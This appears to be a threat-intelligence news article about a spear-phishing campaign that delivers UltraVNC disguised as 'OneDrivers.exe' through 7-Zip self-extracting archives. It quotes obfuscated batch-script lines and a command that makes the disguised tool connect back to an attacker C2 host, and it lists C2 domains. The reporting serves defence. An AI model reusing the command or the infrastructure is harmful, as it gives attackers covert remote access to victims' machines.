New Malware Campaign Using 7z & UltraVNC Tool To Deploy Malware

A sophisticated malware campaign has been uncovered, leveraging 7-Zip self-extracting archives and the UltraVNC remote access tool to target Russian-speaking entities.

The operation, attributed to a threat actor dubbed GamaCopy, mimics tactics previously associated with the Kremlin-aligned Gamaredon group.

The attack chain begins with a spear-phishing email containing a self-extracting (SFX) archive created using 7-Zip.

This archive serves as the initial payload, designed to bypass security measures and deliver subsequent malicious components.

Security analysts at Knownsec 404 Advanced Threat Intelligence team identified that upon execution, the SFX archive unpacks and runs a batch script, which performs several key functions:-

1. Copies a decoy PDF document with military-related content to the victim’s system
2. Installs UltraVNC, disguised as “OneDrivers.exe”
3. Configures UltraVNC to connect to the attacker’s command and control (C2) server

Are you from SOC/DFIR Teams? - Analyse Malware Files & Links with ANY.RUN Sandox -> Try for Free

Infrastructure Analysis

The batch script employs obfuscation techniques to hide the analysis:-

@echo off
setlocal enabledelayedexpansion
set qH09C99079b99D4900=%COMPUTERNAME%
set db53P23A03h83Z23e6=4797
set rM91V31H31q51V41E3=Ultr
set NX96b26L46A16Y66r6=aVNC

This script copies UltraVNC to the system, renames it to “OneDrivers.exe”, and executes it with specific parameters:-

start "" %TEMP%\OneDrivers.exe -autoreconnect -id:%COMPUTERNAME%_SVOD_4797 -connect fmsru.ru:443

The campaign utilizes the following command and control servers: ‘nefteparkstroy.ru:443,’ ‘fmsru.ru:443.’

GamaCopy’s tactics closely resemble those of Core Werewolf (also known as Awaken Likho and PseudoGamaredon), including, “Use of 7z-SFX files for payload delivery,” “Deployment of UltraVNC for remote access,” “Connection to C2 servers over port 443,” “Extensive use of batch script obfuscation.”

This campaign represents a significant threat to Russian-speaking organizations, particularly those in the defense and government sectors. The use of military-themed lures suggests a focus on espionage and data exfiltration.

Organizations should implement the following measures to protect against this threat:-

1. Deploy robust email filtering to detect and quarantine suspicious attachments.
2. Educate employees on identifying phishing attempts, especially those with military or sensitive themes.
3. Implement application whitelisting to prevent unauthorized executables from running.
4. Monitor for unexpected network connections, particularly those using remote access tools like UltraVNC.
5. Regularly update and patch systems to address known vulnerabilities.